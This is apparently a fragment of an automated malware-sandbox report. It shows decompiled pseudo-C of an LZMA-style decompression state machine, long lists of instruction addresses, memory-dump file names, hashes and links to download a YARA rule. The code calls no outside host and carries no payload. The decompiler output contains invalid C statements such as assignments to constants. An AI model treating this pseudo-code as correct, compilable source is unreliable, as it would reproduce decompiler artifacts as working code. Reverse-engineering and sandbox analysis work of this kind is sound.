							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













              0x00000000
              0x00406fa7
              0x00406fa7
              0x00406fab
              0x00407062
              0x00407065
              0x00407071
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x00000000
              0x0040733a
              0x00406fb1
              0x00406fb5
              0x004074f6
              0x004074f6
              0x004074f9
              0x004074fd
              0x004074fd
              0x00406fbb
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00406fcb
              0x00406fcf
              0x00407495
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x00000000
              0x004074f2
              0x00406fd5
              0x00406fd8
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00407009
              0x00407009
              0x00407009
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
              • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406AAC, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406AAC(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
